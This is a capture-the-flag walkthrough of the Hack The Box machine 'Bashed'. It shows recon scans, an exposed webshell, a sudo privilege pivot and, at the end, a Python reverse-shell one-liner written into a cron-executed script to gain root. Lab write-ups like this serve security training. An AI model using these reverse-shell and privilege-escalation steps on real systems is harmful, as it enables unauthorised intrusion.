Hack The Box: Bashed


box bashed

The nmap scan reveals only one port: Port 80 with a apache web server.

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Visiting the website, we see a PHP development page with some kind of blog.

box bashed

In the javascript file, we can see that there is a php/sendMail POST endpoint, but we cannot see the response. Next, I ran a gobuster scan over the website and found some interesting directories:

/images               (Status: 301) [Size: 315] [-->]
/uploads              (Status: 301) [Size: 316] [-->]
/php                  (Status: 301) [Size: 312] [-->]
/css                  (Status: 301) [Size: 312] [-->]
/dev                  (Status: 301) [Size: 312] [-->]
/js                   (Status: 301) [Size: 311] [-->]
/fonts                (Status: 301) [Size: 314] [-->]
/server-status        (Status: 403) [Size: 301]

Specifically the /dev/ directory leads to a webshell.

Initial Foothold

box bashed

From there, we can get the user flag. Next, I run LinEnum and LinPeas to get some hints how to move on. sudo -i reveals that we the user scriptmanager can run all commands without password:

www-data@bashed:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

And here, I made some mistakes. I tried to move to scriptmanager with su, but this did not work as it’s prompting for the password I don’t have:

www-data@bashed:/tmp$ su scriptmanager -c bash
su scriptmanager -c bash

However, THIS one works:

www-data@bashed:/$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash

This enables us to enter the scripts folder where we can find a script that is apparently running every minute - it is reading in the file test.txt and writing its content, so that its timestamp is constantly changing.

$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")

By replacing the file content with a reverse shell python script, we get a root shell.

$ echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > test.py